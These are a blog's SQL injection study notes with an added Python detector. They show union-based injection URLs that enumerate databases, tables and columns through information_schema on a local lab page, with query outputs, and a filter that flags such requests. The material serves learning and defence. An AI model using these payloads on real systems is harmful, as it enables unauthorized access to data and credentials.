  • SQL injection study notes

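    /*

    Please credit the source when reposting. By: 珍惜少年时

    Just a few small notes, kept on the blog to glance over when bored at mealtimes; experts, please go easy.

    */

    珍惜少年时's blog, focused on network security and web penetration testing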


    00x1 Listing all databases:

    mysql> select schema_name from information_schema.schemata;
    +--------------------+
    | schema_name        |
    +--------------------+
    | information_schema |
    | challenges         |
    | dvwa               |
    | mysql              |
    | performance_schema |
    | phpcmsv9           |
    | security           |
    | sqlinject          |
    | test               |
    | test_sqlinjection  |
    +--------------------+
    10 rows in set (0.00 sec)
    

    #This command is equivalent to show databases;
    #So the SQL statement is:
    http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(schema_name) from information_schema.schemata--


    00x2 Listing all tables:

    mysql> select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
    +--------------------------+
    | group_concat(table_name) |
    +--------------------------+
    | admin,user,user_a        |
    +--------------------------+
    1 row in set (0.00 sec)
    

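    #Note:
    0x73716C696E6A656374 is the hexadecimal encoding of the database name sqlinject
    #This command is equivalent to show tables; provided, of course, that a database has been selected, which here is done by the hex value in the where clause.
    #So the SQL statement is:
    http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374--

    #It can be shortened to: select table_name from information_schema.tables

    This SQL statement lists every table without selecting a database. The same goes for column names.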


    00x3 Listing all columns:

    mysql> select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
    +----------------------------------------------------------------+
    | group_concat(column_name)                                      |
    +----------------------------------------------------------------+
    | id,username,password,id,username,password,id,username,password |
    +----------------------------------------------------------------+
    1 row in set (0.03 sec)

    So the statement is:
    http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374--
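
A defender's view of the three requests above, as an added example that is not part of the original post: a Python filter that flags request lines combining UNION SELECT with the information_schema catalog views and decodes any hex string literal, so the targeted schema name appears in the alert. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not from the original post).
SAMPLE_LOG = [
    "GET /sqlinjection.php?id=5 HTTP/1.1",
    "GET /sqlinjection.php?id=-5%20union%20select%201,2,"
    "group_concat(schema_name)%20from%20information_schema.schemata-- HTTP/1.1",
    "GET /sqlinjection.php?id=-5+UNION+SELECT+1,2,group_concat(table_name)"
    "+from+information_schema.tables+where+table_schema=0x73716C696E6A656374-- HTTP/1.1",
    "GET /search.php?q=student+union+election+results HTTP/1.1",
]

UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
CATALOG = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b")
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")

def normalize(request_line):
    """URL-decode, lower-case and collapse whitespace before matching."""
    return re.sub(r"\s+", " ", unquote_plus(request_line).lower())

def inspect(request_line):
    """Return a finding for a catalog-enumeration request, else None."""
    text = normalize(request_line)
    catalog = CATALOG.search(text)
    if not (UNION_SELECT.search(text) and catalog):
        return None
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if all(32 <= b < 127 for b in raw):  # keep printable ASCII only
            decoded.append(raw.decode("ascii"))
    return {"catalog": catalog.group(1), "hex_strings": decoded}

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    findings = []
    for number, line in enumerate(lines, 1):
        finding = inspect(line)
        if finding:
            findings.append((number, finding))
    return findings

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```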

  • Original article: https://www.cnblogs.com/xishaonian/p/6059998.html